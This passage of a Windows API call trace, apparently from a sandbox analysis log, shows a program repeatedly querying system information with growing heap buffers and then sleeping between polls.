NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0244.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0244.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0244.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.332] Sleep (dwMilliseconds=0x110) [0244.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0244.345] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0244.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0244.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0244.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0244.347] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0244.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0244.347] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0244.348] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.348] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.348] Sleep (dwMilliseconds=0x110) [0244.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0244.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0244.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0244.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0244.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0244.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0244.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0244.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0244.364] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.364] Sleep (dwMilliseconds=0x110) [0244.392] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0244.392] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0244.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0244.393] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0244.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0244.393] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0244.394] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0244.394] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0244.394] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.395] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.395] Sleep (dwMilliseconds=0x110) [0244.418] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0244.418] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.418] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0244.429] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0244.429] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.430] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0244.430] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0244.430] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.430] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0244.430] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0244.430] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.430] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0244.431] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.431] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.431] Sleep (dwMilliseconds=0x110) [0244.435] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0244.435] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.436] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0244.436] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0244.436] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.436] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0244.436] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0244.436] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0244.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0244.437] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0244.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.438] Sleep (dwMilliseconds=0x110) [0244.454] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0244.454] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0244.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0244.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0244.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0244.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0244.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0244.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0244.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.457] Sleep (dwMilliseconds=0x110) [0244.473] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0244.473] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.473] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0244.473] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0244.473] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.474] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0244.474] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0244.474] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.474] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0244.474] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0244.474] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.474] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0244.474] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.475] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.475] Sleep (dwMilliseconds=0x110) [0244.481] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0244.481] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.482] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0244.482] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0244.482] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.482] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0244.482] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0244.482] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.483] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0244.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0244.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.483] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0244.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.484] Sleep (dwMilliseconds=0x110) [0244.498] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0244.498] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.498] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0244.498] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0244.498] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0244.499] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0244.499] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0244.499] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0244.499] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.500] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0244.500] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.500] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.500] Sleep (dwMilliseconds=0x110) [0244.523] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0244.523] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.523] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0244.523] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0244.524] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.524] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0244.524] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0244.524] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.525] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0244.525] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0244.525] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.525] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0244.525] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.525] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.525] Sleep (dwMilliseconds=0x110) [0244.528] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0244.528] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.529] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0244.529] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0244.529] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.529] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0244.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0244.532] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0244.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0244.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0244.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.533] Sleep (dwMilliseconds=0x110) [0244.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0244.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0244.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0244.547] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0244.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0244.547] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0244.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0244.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0244.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.549] Sleep (dwMilliseconds=0x110) [0244.559] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0244.559] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.560] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0244.560] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0244.560] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0244.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0244.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0244.562] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0244.562] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0244.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0244.562] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0244.563] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0244.563] Sleep (dwMilliseconds=0x110) [0244.579] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0244.579] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0244.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0244.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0244.581] HeapFree (in: 